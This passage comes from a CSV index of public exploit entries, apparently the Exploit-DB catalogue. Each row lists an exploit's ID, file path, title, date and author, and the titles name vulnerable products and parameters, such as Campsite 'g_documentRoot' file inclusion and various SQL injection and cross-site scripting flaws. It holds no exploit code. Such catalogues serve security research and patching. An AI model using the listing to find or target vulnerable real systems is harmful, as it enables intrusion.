'ArticleAttachment.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +29969,exploits/php/webapps/29969.txt,"Campsite 2.6.1 - 'ArticleComment.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +29970,exploits/php/webapps/29970.txt,"Campsite 2.6.1 - 'ArticleData.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +29971,exploits/php/webapps/29971.txt,"Campsite 2.6.1 - 'ArticleImage.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +29972,exploits/php/webapps/29972.txt,"Campsite 2.6.1 - 'ArticleIndex.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +29973,exploits/php/webapps/29973.txt,"Campsite 2.6.1 - 'ArticlePublish.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +29974,exploits/php/webapps/29974.txt,"Campsite 2.6.1 - 'ArticleTopic.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +29975,exploits/php/webapps/29975.txt,"Campsite 2.6.1 - 'ArticleType.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +29976,exploits/php/webapps/29976.txt,"Campsite 2.6.1 - 'ArticleTypeField.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +29977,exploits/php/webapps/29977.txt,"Campsite 2.6.1 - 'Country.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +29978,exploits/php/webapps/29978.txt,"Campsite 2.6.1 - 'DatabaseObject.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +29979,exploits/php/webapps/29979.txt,"Campsite 2.6.1 - 'Event.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +29980,exploits/php/webapps/29980.txt,"Campsite 2.6.1 - 'IPAccess.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +29981,exploits/php/webapps/29981.txt,"Campsite 2.6.1 - 'image.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +29982,exploits/php/webapps/29982.txt,"Campsite 2.6.1 - 'issue.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +29983,exploits/php/webapps/29983.txt,"Campsite 2.6.1 - 'IssuePublish.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +29984,exploits/php/webapps/29984.txt,"Campsite 2.6.1 - 'Language.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +29985,exploits/php/webapps/29985.txt,"Campsite 2.6.1 - 'Log.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +29986,exploits/php/webapps/29986.txt,"Campsite 2.6.1 - 'LoginAttempts.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +29987,exploits/php/webapps/29987.txt,"Campsite 2.6.1 - 'Publication.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +29988,exploits/php/webapps/29988.txt,"Campsite 2.6.1 - 'Section.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +29989,exploits/php/webapps/29989.txt,"Campsite 2.6.1 - 'ShortURL.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +29990,exploits/php/webapps/29990.txt,"Campsite 2.6.1 - 'Subscription.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +29991,exploits/php/webapps/29991.txt,"Campsite 2.6.1 - 'SubscriptionDefaultTime.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +29996,exploits/php/webapps/29996.txt,"Campsite 2.6.1 - 'topic.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +29997,exploits/php/webapps/29997.txt,"Campsite 2.6.1 - 'UrlType.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +29998,exploits/php/webapps/29998.txt,"Campsite 2.6.1 - 'user.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +29999,exploits/php/webapps/29999.txt,"Campsite 2.6.1 - 'UserType.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +30000,exploits/ios/webapps/30000.txt,"Photo Transfer Wifi 1.4.4 iOS - Multiple Web Vulnerabilities",2013-12-02,Vulnerability-Lab,webapps,ios, +30002,exploits/php/webapps/30002.txt,"WordPress Plugin Formcraft - SQL Injection",2013-12-02,"Ashiyane Digital Security Team",webapps,php, +30003,exploits/php/webapps/30003.txt,"Campsite 2.6.1 - '/implementation/Management/configuration.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +30004,exploits/php/webapps/30004.txt,"Campsite 2.6.1 - '/implementation/Management/db_connect.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +30005,exploits/php/webapps/30005.txt,"Campsite 2.6.1 - 'LocalizerConfig.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +30006,exploits/php/webapps/30006.txt,"Campsite 2.6.1 - 'LocalizerLanguage.php?g_documentRoot' Remote File Inclusion",2007-05-08,anonymous,webapps,php, +30012,exploits/php/webapps/30012.txt,"Chamilo Lms 1.9.6 - 'profile.php?password' SQL Injection",2013-12-03,"High-Tech Bridge SA",webapps,php,80 +30013,exploits/php/webapps/30013.txt,"Dokeos 2.2 RC2 - 'index.php?language' SQL Injection",2013-12-03,"High-Tech Bridge SA",webapps,php,80 +30062,exploits/hardware/webapps/30062.py,"D-Link DSR Router Series - Remote Command Execution",2013-12-06,0_o,webapps,hardware, +30063,exploits/php/webapps/30063.txt,"WordPress Plugin DZS Video Gallery 3.1.3 - Remote File Disclosure / Local File Disclosure",2013-12-06,"aceeeeeeeer .",webapps,php, +30064,exploits/php/webapps/30064.txt,"HLstats 1.35 - 'hlstats.php' Multiple Cross-Site Scripting Vulnerabilities",2007-05-19,"John Martinelli",webapps,php, +30065,exploits/php/webapps/30065.html,"GaliX 2.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-05-21,"John Martinelli",webapps,php, +30066,exploits/php/webapps/30066.txt,"Jetbox CMS 2.1 - Multiple SQL Injections",2007-05-21,"Jesper Jurcenoks",webapps,php, +30068,exploits/php/webapps/30068.txt,"Jetbox CMS 2.1 - Login Variable Cross-Site Scripting",2007-05-22,"Jesper Jurcenoks",webapps,php, +30070,exploits/php/webapps/30070.html,"ClonusWiki 0.5 - 'index.php' HTML Injection",2007-05-22,"John Martinelli",webapps,php, +30071,exploits/php/webapps/30071.txt,"ABC Excel Parser Pro 4.0 - 'Parser_Path' Remote File Inclusion",2007-05-22,the_Edit0r,webapps,php, +30073,exploits/php/webapps/30073.txt,"GMTT Music Distro 1.2 - 'ShowOwn.php' Cross-Site Scripting",2007-05-22,CorryL,webapps,php, +30075,exploits/php/webapps/30075.txt,"phpPgAdmin 4.1.1 - 'SQLEDIT.php' Cross-Site Scripting",2007-05-23,"Michal Majchrowicz",webapps,php, +30076,exploits/php/webapps/30076.txt,"WYYS 1.0 - 'index.php' Cross-Site Scripting",2007-05-23,vagrant,webapps,php, +30077,exploits/asp/webapps/30077.txt,"Cisco CallManager 4.1 - Search Form Cross-Site Scripting",2007-05-23,"Marc Ruef",webapps,asp, +30079,exploits/php/webapps/30079.txt,"2z Project 0.9.5 - 'rating.php' Cross-Site Scripting",2007-05-23,"Janek Vind",webapps,php, +30081,exploits/php/webapps/30081.txt,"ASP-Nuke 2.0.7 - 'news.asp' Cross-Site Scripting",2007-05-24,vagrant,webapps,php, +30082,exploits/php/webapps/30082.txt,"GNUTurk - 'Mods.php' Cross-Site Scripting",2007-05-25,vagrant,webapps,php, +30083,exploits/php/webapps/30083.txt,"BoxBilling 3.6.11 - 'mod_notification' Persistent Cross-Site Scripting",2013-12-06,LiquidWorm,webapps,php, +30084,exploits/php/webapps/30084.php,"WordPress Plugin page-flip-image-gallery - Arbitrary File Upload",2013-12-06,"Ashiyane Digital Security Team",webapps,php, +30086,exploits/php/webapps/30086.txt,"BoastMachine 3.1 - 'index.php' Cross-Site Scripting",2007-05-25,newbinaryfile,webapps,php, +30087,exploits/php/webapps/30087.txt,"Digirez 3.4 - Multiple Cross-Site Scripting Vulnerabilities",2007-05-25,Linux_Drox,webapps,php, +30088,exploits/php/webapps/30088.txt,"Pligg CMS 9.5 - Reset Forgotten Password Security Bypass",2007-05-25,"242th section",webapps,php, +30095,exploits/php/webapps/30095.txt,"DGNews 1.5.1/2.1 - 'news.php' SQL Injection",2007-05-28,"Jesper Jurcenoks",webapps,php, +30097,exploits/php/webapps/30097.txt,"UebiMiau 2.7.10 - '/demo/pop3/error.php?selected_theme' Cross-Site Scripting",2007-05-29,"Michal Majchrowicz",webapps,php, +30098,exploits/php/webapps/30098.txt,"UebiMiau 2.7.10 - '/demo/pop3/error.php' Multiple Full Path Disclosures",2007-05-29,"Michal Majchrowicz",webapps,php, +30099,exploits/php/webapps/30099.txt,"DGNews 2.1 - 'NewsID' SQL Injection",2007-05-28,"laurent gaffie",webapps,php, +30101,exploits/php/webapps/30101.txt,"CPCommerce 1.1 - 'manufacturer.php' SQL Injection",2007-05-29,"laurent gaffie",webapps,php, +30102,exploits/php/webapps/30102.php,"Pheap 2.0 - 'config.php' Pheap_Login Authentication Bypass",2007-05-30,Silentz,webapps,php, +30103,exploits/php/webapps/30103.txt,"Particle Blogger 1.2.1 - 'Archives.php' SQL Injection",2007-03-16,Serapis.net,webapps,php, +30213,exploits/php/webapps/30213.txt,"eFront 3.6.14 (build 18012) - Multiple Persistent Cross-Site Scripting Vulnerabilities",2013-12-11,sajith,webapps,php, +30215,exploits/ios/webapps/30215.txt,"Photo Video Album Transfer 1.0 iOS - Multiple Vulnerabilities",2013-12-11,Vulnerability-Lab,webapps,ios, +30283,exploits/php/webapps/30283.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Multiple Remote Command Execution Vulnerabilities",2007-07-09,"Stefan Esser",webapps,php, +30216,exploits/cfm/webapps/30216.txt,"FuseTalk 4.0 - 'AuthError.cfm' Multiple Cross-Site Scripting Vulnerabilities",2007-06-20,"Ivan Almuina",webapps,cfm, +30217,exploits/php/webapps/30217.txt,"Wrapper.php for osCommerce - Local File Inclusion",2007-06-20,"Joe Bloomquist",webapps,php, +30220,exploits/php/webapps/30220.txt,"PHPAccounts 0.5 - 'index.php' Local File Inclusion",2007-06-21,r0t,webapps,php, +30221,exploits/php/webapps/30221.txt,"PHPAccounts 0.5 - 'index.php' Multiple SQL Injections",2007-06-21,r0t,webapps,php, +30223,exploits/php/webapps/30223.txt,"NetClassifieds 1.9.7 - Multiple Input Validation Vulnerabilities",2007-06-21,"laurent gaffie",webapps,php, +30225,exploits/php/webapps/30225.txt,"eNdonesia 8.4 - 'mod.php?viewarticle Action artid' SQL Injection",2007-06-22,"laurent gaffie",webapps,php, +30226,exploits/php/webapps/30226.txt,"eNdonesia 8.4 - 'banners.php?click Action bid' SQL Injection",2007-06-22,"laurent gaffie",webapps,php, +30227,exploits/php/webapps/30227.txt,"Joomla! / Mambo Component Mod_Forum - 'PHPBB_Root.php' Remote File Inclusion",2007-06-22,spymeta,webapps,php, +30230,exploits/php/webapps/30230.txt,"MyNews 0.10 - AuthACC SQL Injection",2007-06-25,netVigilance,webapps,php, +30232,exploits/php/webapps/30232.txt,"Calendarix 0.7.20070307 - Multiple Cross-Site Scripting Vulnerabilities",2007-06-25,"Jesper Jurcenoks",webapps,php, +30234,exploits/php/webapps/30234.txt,"Calendarix 0.7.20070307 - Multiple SQL Injections",2007-06-25,"Jesper Jurcenoks",webapps,php, +30235,exploits/php/webapps/30235.txt,"KikChat - Local File Inclusion / Remote Code Execution",2013-12-12,cr4wl3r,webapps,php, +30238,exploits/php/webapps/30238.txt,"Cythosia 2.x Botnet (C2 Web Panel) - SQL Injection",2013-12-12,GalaxyAndroid,webapps,php, +30366,exploits/php/webapps/30366.txt,"Alstrasoft Video Share Enterprise 4.x - Multiple Input Validation Vulnerabilities",2007-07-23,Lostmon,webapps,php, +30246,exploits/php/webapps/30246.txt,"WHMCompleteSolution (WHMCS) 4.x/5.x - Multiple Web Vulnerabilities",2013-12-12,"AhwAk20o0 --",webapps,php, +30248,exploits/hardware/webapps/30248.txt,"Pentagram Cerberus P 6363 DSL Router - Multiple Vulnerabilities",2013-12-12,condis,webapps,hardware, +30249,exploits/php/webapps/30249.txt,"Papoo 1.0.3 - 'Plugin.php' Authentication Bypass",2007-06-27,"Nico Leidecker",webapps,php, +30250,exploits/asp/webapps/30250.txt,"DUClassmate 1.x - 'ICity' SQL Injection",2006-12-02,"Aria-Security Team",webapps,asp, +30253,exploits/php/webapps/30253.txt,"ETicket 1.5.5 - 'Open.php' Multiple Cross-Site Scripting Vulnerabilities",2007-06-27,"Jesper Jurcenoks",webapps,php, +30259,exploits/php/webapps/30259.txt,"Claroline 1.8.3 - '$_SERVER['PHP_SELF']' Multiple Cross-Site Scripting Vulnerabilities",2007-07-02,munozferna,webapps,php, +30260,exploits/cgi/webapps/30260.txt,"Yoggie Pico and Pico Pro Backticks - Remote Code Execution",2007-07-02,"Cody Brocious",webapps,cgi, +30261,exploits/php/webapps/30261.txt,"Moodle 1.7.1 - 'index.php' Cross-Site Scripting",2007-07-02,MustLive,webapps,php, +30262,exploits/php/webapps/30262.txt,"Liesbeth Base CMS - Information Disclosure",2007-07-02,durito,webapps,php, +30263,exploits/cgi/webapps/30263.txt,"Oliver - Multiple Cross-Site Scripting Vulnerabilities",2007-07-03,"A. R.",webapps,cgi, +30266,exploits/jsp/webapps/30266.txt,"NetFlow Analyzer 5 - '/jspui/applicationList.jsp?alpha' Cross-Site Scripting",2007-07-04,Lostmon,webapps,jsp, +30267,exploits/jsp/webapps/30267.txt,"NetFlow Analyzer 5 - '/jspui/appConfig.jsp?task' Cross-Site Scripting",2007-07-04,Lostmon,webapps,jsp, +30268,exploits/jsp/webapps/30268.txt,"NetFlow Analyzer 5 - 'netflow/jspui/index.jsp?view' Cross-Site Scripting",2007-07-04,Lostmon,webapps,jsp, +30269,exploits/jsp/webapps/30269.txt,"NetFlow Analyzer 5 - '/jspui/selectDevice.jsp?rtype' Cross-Site Scripting",2007-07-04,Lostmon,webapps,jsp, +30270,exploits/jsp/webapps/30270.txt,"NetFlow Analyzer 5 - '/jspui/customReport.jsp?rtype' Cross-Site Scripting",2007-07-04,Lostmon,webapps,jsp, +30271,exploits/java/webapps/30271.txt,"OpManager 6/7 - 'ping.do?name' Cross-Site Scripting",2007-07-04,Lostmon,webapps,java, +30272,exploits/java/webapps/30272.txt,"OpManager 6/7 - 'traceRoute.do?name' Cross-Site Scripting",2007-07-04,Lostmon,webapps,java, +30273,exploits/java/webapps/30273.txt,"OpManager 6/7 - reports/ReportViewAction.do Multiple Cross-Site Scripting Vulnerabilities",2007-07-04,Lostmon,webapps,java, +30274,exploits/java/webapps/30274.txt,"OpManager 6/7 - 'admin/ServiceConfiguration.do?Operation' Cross-Site Scripting",2007-07-04,Lostmon,webapps,java, +30275,exploits/java/webapps/30275.txt,"OpManager 6/7 - '/admin/DeviceAssociation.do' Multiple Cross-Site Scripting Vulnerabilities",2007-07-04,Lostmon,webapps,java, +30277,exploits/php/webapps/30277.txt,"Maia Mailguard 1.0.2 - 'login.php' Multiple Local File Inclusions",2007-07-05,"Adriel T. Desautels",webapps,php, +30282,exploits/asp/webapps/30282.txt,"Levent Veysi Portal 1.0 - 'Oku.asp' SQL Injection",2007-07-07,GeFORC3,webapps,asp, +30286,exploits/linux/webapps/30286.txt,"ImgSvr 0.6 - 'Template' Local File Inclusion",2007-07-10,"Tim Brown",webapps,linux, +30289,exploits/asp/webapps/30289.txt,"EnViVo!CMS - 'default.asp?ID' SQL Injection",2007-07-11,durito,webapps,asp, +30290,exploits/php/webapps/30290.txt,"IBM Proventia Sensor Appliance - Multiple Input Validation Vulnerabilities",2007-07-11,"Alex Hernandez",webapps,php, +30293,exploits/php/webapps/30293.txt,"Helma 1.5.3 - Search Script Cross-Site Scripting",2007-07-12,"Hanno Boeck",webapps,php, +30294,exploits/php/webapps/30294.txt,"Inmostore 4.0 - 'index.php' SQL Injection",2007-07-12,Keniobats,webapps,php, +30296,exploits/asp/webapps/30296.txt,"ActiveWeb Contentserver 5.6.2929 - 'Picture_Real_Edit.asp' SQL Injection",2007-07-13,"RedTeam Pentesting",webapps,asp, +30297,exploits/asp/webapps/30297.txt,"contentserver 5.6.2929 - '/errors/rights.asp?msg' Cross-Site Scripting",2007-07-13,"RedTeam Pentesting",webapps,asp, +30298,exploits/asp/webapps/30298.txt,"contentserver 5.6.2929 - '/errors/transaction.asp?msg' Cross-Site Scripting",2007-07-13,"RedTeam Pentesting",webapps,asp, +30299,exploits/php/webapps/30299.txt,"ActiveWeb Contentserver CMS 5.6.2929 - Client-Side Filtering Bypass",2007-07-13,"RedTeam Pentesting",webapps,php, +30300,exploits/asp/webapps/30300.txt,"MzK Blog - 'Katgoster.asp' SQL Injection",2007-03-23,GeFORC3,webapps,asp, +30301,exploits/php/webapps/30301.txt,"Dating Gold 3.0.5 - 'header.php?int_path' Remote File Inclusion",2007-07-13,mostafa_ragab,webapps,php, +30302,exploits/php/webapps/30302.txt,"Dating Gold 3.0.5 - 'footer.php?int_path' Remote File Inclusion",2007-07-13,mostafa_ragab,webapps,php, +30303,exploits/php/webapps/30303.txt,"Dating Gold 3.0.5 - 'secure.admin.php?int_path' Remote File Inclusion",2007-07-13,mostafa_ragab,webapps,php, +30383,exploits/php/webapps/30383.txt,"Vikingboard 0.1.2 - 'cp.php' Cross-Site Scripting",2007-07-25,Lostmon,webapps,php, +30384,exploits/php/webapps/30384.txt,"Vikingboard 0.1.2 - 'user.php' Cross-Site Scripting",2007-07-25,Lostmon,webapps,php, +30385,exploits/php/webapps/30385.txt,"Vikingboard 0.1.2 - 'post.php' Cross-Site Scripting",2007-07-25,Lostmon,webapps,php, +30386,exploits/php/webapps/30386.txt,"Vikingboard 0.1.2 - 'topic.php' Cross-Site Scripting",2007-07-25,Lostmon,webapps,php, +30387,exploits/php/webapps/30387.txt,"Vikingboard 0.1.2 - 'forum.php' Information Disclosure",2007-07-25,Lostmon,webapps,php, +30388,exploits/php/webapps/30388.txt,"Vikingboard 0.1.2 - 'cp.php' Information Disclosure",2007-07-25,Lostmon,webapps,php, +30389,exploits/php/webapps/30389.txt,"iFoto 1.0 - 'index.php' Directory Traversal",2007-07-25,Lostmon,webapps,php, +30390,exploits/php/webapps/30390.txt,"BSM Store Dependent Forums 1.02 - 'Username' SQL Injection",2007-07-26,"Aria-Security Team",webapps,php, +30391,exploits/php/webapps/30391.txt,"PHPHostBot 1.05 - 'Authorize.php' Remote File Inclusion",2007-07-26,S4M3K,webapps,php, +30801,exploits/php/webapps/30801.txt,"Bandersnatch 0.4 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-11-23,"Tim Brown",webapps,php, +30310,exploits/php/webapps/30310.txt,"Piwigo CMS 2.5.3 - Multiple Web Vulnerabilities",2013-12-15,sajith,webapps,php, +30311,exploits/ios/webapps/30311.txt,"Phone Drive Eightythree 4.1.1 iOS - Multiple Vulnerabilities",2013-12-15,Vulnerability-Lab,webapps,ios, +30312,exploits/php/webapps/30312.txt,"Citadel WebCit 7.02/7.10 - 'showuser?who' Cross-Site Scripting",2007-07-14,"Christopher Schwardt",webapps,php, +30313,exploits/asp/webapps/30313.txt,"TBDev.NET DR - 'TakeProfEdit.php' HTML Injection",2007-07-16,PescaoDeth,webapps,asp, +30316,exploits/asp/webapps/30316.txt,"husrevforum 1.0.1/2.0.1 - 'Philboard_forum.asp' SQL Injection",2007-07-17,GeFORC3,webapps,asp, +30317,exploits/php/webapps/30317.txt,"Insanely Simple Blog 0.4/0.5 - 'index.php' SQL Injection",2007-07-17,joseph.giron13,webapps,php, +30318,exploits/php/webapps/30318.txt,"Insanely Simple Blog 0.4/0.5 - Cross-Site Scripting",2007-07-17,joseph.giron13,webapps,php, +30320,exploits/php/webapps/30320.txt,"GeoBlog MOD_1.0 - 'deletecomment.php?id' Arbitrary Comment Deletion",2007-07-19,joseph.giron13,webapps,php, +30321,exploits/php/webapps/30321.txt,"GeoBlog MOD_1.0 - 'deleteblog.php?id' Arbitrary Blog Deletion",2007-07-19,joseph.giron13,webapps,php, +30323,exploits/php/webapps/30323.txt,"UseBB 1.0.7 - '/install/upgrade-0-2-3.php?PHP_SELF' Cross-Site Scripting",2007-07-20,s4mi,webapps,php, +30324,exploits/php/webapps/30324.txt,"UseBB 1.0.7 - '/install/upgrade-0-3.php?PHP_SELF' Cross-Site Scripting",2007-07-20,s4mi,webapps,php, +30978,exploits/php/webapps/30978.txt,"WordPress 2.2.3 - '/wp-admin/page-new.php?popuptitle' Cross-Site Scripting",2008-01-03,3APA3A,webapps,php, +30327,exploits/asp/webapps/30327.html,"Dora Emlak 1.0 Script - Multiple Input Validation Vulnerabilities",2007-07-23,GeFORC3,webapps,asp, +30328,exploits/asp/webapps/30328.txt,"Alisveris Sitesi Scripti - 'index.asp' SQL Injection",2007-07-23,GeFORC3,webapps,asp, +30329,exploits/php/webapps/30329.sh,"Gitlab 6.0 - Persistent Cross-Site Scripting",2013-12-16,hellok,webapps,php, +30330,exploits/asp/webapps/30330.txt,"Alisveris Sitesi Scripti - 'index.asp' Cross-Site Scripting",2007-07-23,GeFORC3,webapps,asp, +30331,exploits/asp/webapps/30331.html,"ASP cvmatik 1.1 - Multiple HTML Injection Vulnerabilities",2007-07-23,GeFORC3,webapps,asp, +30332,exploits/asp/webapps/30332.txt,"Image Racer - 'searchresults.asp' SQL Injection",2007-07-23,"Aria-Security Team",webapps,asp, +30333,exploits/php/webapps/30333.txt,"PHMe 0.0.2 - 'Function_List.php' Local File Inclusion",2007-07-23,You_You,webapps,php, +30382,exploits/asp/webapps/30382.txt,"W1L3D4 philboard 0.3 - Cross-Site Scripting",2007-07-25,GeFORC3,webapps,asp, +30378,exploits/php/webapps/30378.txt,"Webbler CMS 3.1.3 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-07-24,"Adrian Pastor",webapps,php, +30379,exploits/php/webapps/30379.html,"Webbler CMS 3.1.3 - Mail A Friend Open Email Relay",2007-07-24,"Adrian Pastor",webapps,php, +30380,exploits/php/webapps/30380.txt,"cPanel 10.9.1 - 'Resname' Cross-Site Scripting",2007-07-24,"Aria-Security Team",webapps,php, +30803,exploits/php/webapps/30803.txt,"CoolShot E-Lite POS 1.0 - Login SQL Injection",2007-11-24,"Aria-Security Team",webapps,php, +30793,exploits/asp/webapps/30793.txt,"VUNET Mass Mailer - 'default.asp' SQL Injection",2007-11-21,"Aria-Security Team",webapps,asp, +30794,exploits/asp/webapps/30794.txt,"VUNET Case Manager 3.4 - 'default.asp' SQL Injection",2007-11-21,The-0utl4w,webapps,asp, +30375,exploits/ios/webapps/30375.txt,"FileMaster SY-IT 3.1 iOS - Multiple Web Vulnerabilities",2013-12-17,Vulnerability-Lab,webapps,ios, +30358,exploits/hardware/webapps/30358.txt,"UPC Ireland Cisco EPC 2425 Router / Horizon Box - WPA-PSK Handshake Information",2013-12-16,"Matt O'Connor",webapps,hardware, +30792,exploits/php/webapps/30792.html,"Underground CMS 1.x - 'Search.Cache.Inc.php' Backdoor Access",2007-11-21,D4m14n,webapps,php, +30356,exploits/php/webapps/30356.txt,"Wallpaper Script 3.5.0082 - Persistent Cross-Site Scripting",2013-12-16,"null pointer",webapps,php, +30415,exploits/hardware/webapps/30415.txt,"Cisco EPC3925 - Persistent Cross-Site Scripting",2013-12-21,"Jeroen - IT Nerdbox",webapps,hardware, +30357,exploits/php/webapps/30357.txt,"iScripts MultiCart 2.4 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Cross-Site Scripting / Cross-Site Request Forgery / Mass Accounts Takeover",2013-12-16,"Saadi Siddiqui",webapps,php, +30361,exploits/hardware/webapps/30361.txt,"Beetel TC1-450 Airtel Wireless Router - Multiple Cross-Site Request Forgery Vulnerabilities",2013-12-16,"Samandeep Singh",webapps,hardware, +30362,exploits/hardware/webapps/30362.txt,"Cisco EPC3925 - Cross-Site Request Forgery",2013-12-16,"Jeroen - IT Nerdbox",webapps,hardware, +30876,exploits/php/webapps/30876.txt,"Falcon Series One 1.4.3 stable - Multiple Input Validation Vulnerabilities",2007-11-10,MhZ91,webapps,php, +30364,exploits/php/webapps/30364.txt,"Lowest Unique Bid Auction - SQL Injection",2013-12-16,3spi0n,webapps,php, +30365,exploits/php/webapps/30365.txt,"Penny Auction 5 - SQL Injection",2013-12-16,3spi0n,webapps,php, +30800,exploits/asp/webapps/30800.html,"FooSun - 'Api_Response.asp' SQL Injection",2007-11-23,flyh4t,webapps,asp, +30396,exploits/php/webapps/30396.txt,"Ditto Forensic FieldStation 2013Oct15a - Multiple Vulnerabilities",2013-12-17,"Martin Wundram",webapps,php,80 +30398,exploits/php/webapps/30398.txt,"InstantCMS 1.10.3 - Blind SQL Injection",2013-12-17,"High-Tech Bridge SA",webapps,php,80 +40521,exploits/php/webapps/40521.txt,"Thatware 0.4.6 - SQL Injection",2016-10-13,Besim,webapps,php, +30402,exploits/asp/webapps/30402.txt,"Nukedit 4.9.x - 'login.asp' Cross-Site Scripting",2007-07-26,d3hydr8,webapps,asp, +30403,exploits/php/webapps/30403.txt,"WordPress Plugin WP-FeedStats 2.1 - HTML Injection",2007-07-26,"David Kierznowski",webapps,php, +40518,exploits/php/webapps/40518.txt,"Simple Blog PHP 2.0 - Multiple Vulnerabilities",2016-10-13,"Ehsan Hosseini",webapps,php, +40519,exploits/php/webapps/40519.txt,"Simple Blog PHP 2.0 - SQL Injection",2016-10-13,"Ehsan Hosseini",webapps,php, +30405,exploits/php/webapps/30405.txt,"Bandersnatch 0.4 - Multiple Input Validation Vulnerabilities",2007-07-27,"Tim Brown",webapps,php, +30408,exploits/php/webapps/30408.txt,"Jenkins 1.523 - Persistent HTML Code",2013-12-18,"Christian Catalano",webapps,php, +30409,exploits/php/webapps/30409.txt,"SonarQube Jenkins Plugin - Plain Text Password",2013-12-18,"Christian Catalano",webapps,php, +31463,exploits/asp/webapps/31463.txt,"Iatek Knowledge Base - 'content_by_cat.asp' SQL Injection",2008-03-20,xcorpitx,webapps,asp, +31466,exploits/cgi/webapps/31466.txt,"Webutil 2.3/2.7 - 'webutil.pl' Multiple Remote Command Execution Vulnerabilities",2008-03-21,"Zero X",webapps,cgi, +31467,exploits/php/webapps/31467.txt,"phpMyChat 0.14.5 - 'setup.php3' Cross-Site Scripting",2008-03-22,ZoRLu,webapps,php, +31468,exploits/php/webapps/31468.txt,"My Web Doc 2000 Administration Pages - Multiple Authentication Bypass Vulnerabilities",2008-03-22,ZoRLu,webapps,php, +30799,exploits/php/webapps/30799.txt,"MySpace Scripts Poll Creator - 'index.php' HTML Injection",2007-11-22,Doz,webapps,php, +30873,exploits/php/webapps/30873.txt,"E-Xoops 1.0.5/1.0.8 - '/myalbum/ratephoto.php?lid' SQL Injection",2007-12-10,Lostmon,webapps,php, +30874,exploits/php/webapps/30874.txt,"E-Xoops 1.0.5/1.0.8 - '/modules/banners/click.php?bid' SQL Injection",2007-12-10,Lostmon,webapps,php, +30875,exploits/php/webapps/30875.txt,"E-Xoops 1.0.5/1.0.8 - '/modules/arcade/index.php?gid' SQL Injection",2007-12-10,Lostmon,webapps,php, +30423,exploits/asp/webapps/30423.txt,"Metyus Forum Portal 1.0 - 'Philboard_Forum.asp' SQL Injection",2007-07-27,Cr@zy_King,webapps,asp, +30424,exploits/asp/webapps/30424.txt,"Berthanas Ziyaretci Defteri 2.0 - 'Yonetici.asp' SQL Injection",2007-07-28,Yollubunlar,webapps,asp, +30425,exploits/asp/webapps/30425.txt,"Online Store Application Template - 'Sign_In.aspx' SQL Injection",2007-07-28,"Aria-Security Team",webapps,asp, +30426,exploits/asp/webapps/30426.txt,"Message Board / Threaded Discussion Forum - 'Sign_In.aspx' SQL Injection",2007-07-28,"Aria-Security Team",webapps,asp, +30427,exploits/asp/webapps/30427.txt,"Pay Roll Time Sheet and Punch Card Application With Web UI - 'login.asp' SQL Injection",2007-07-28,"Aria-Security Team",webapps,asp, +30428,exploits/asp/webapps/30428.txt,"Real Estate Listing Website Application Template Login Dialog - SQL Injection",2007-07-28,"Aria-Security Team",webapps,asp, +30429,exploits/php/webapps/30429.txt,"phpCoupon - Remote Payment Bypass",2007-07-28,freeprotect.net,webapps,php, +30433,exploits/php/webapps/30433.txt,"IT!CMS 0.2 - 'lang-en.php?wndtitle' Cross-Site Scripting",2007-07-30,"Aria-Security Team",webapps,php, +30434,exploits/php/webapps/30434.txt,"IT!CMS 0.2 - 'menu-ed.php?wndtitle' Cross-Site Scripting",2007-07-30,"Aria-Security Team",webapps,php, +30435,exploits/php/webapps/30435.txt,"IT!CMS 0.2 - 'titletext-ed.php?wndtitle' Cross-Site Scripting",2007-07-30,"Aria-Security Team",webapps,php, +30436,exploits/php/webapps/30436.txt,"Global Centre Aplomb Poll 1.1 - 'index.php?Madoa' Remote File Inclusion",2007-07-30,"ilker Kandemir",webapps,php, +30437,exploits/php/webapps/30437.txt,"Global Centre Aplomb Poll 1.1 - 'vote.php?Madoa' Remote File Inclusion",2007-07-30,"ilker Kandemir",webapps,php, +30438,exploits/php/webapps/30438.txt,"Global Centre Aplomb Poll 1.1 - 'admin.php?Madoa' Remote File Inclusion",2007-07-30,"ilker Kandemir",webapps,php, +30440,exploits/cgi/webapps/30440.txt,"WebEvent 4.03 - 'Webevent.cgi' Cross-Site Scripting",2007-07-31,d3hydr8,webapps,cgi, 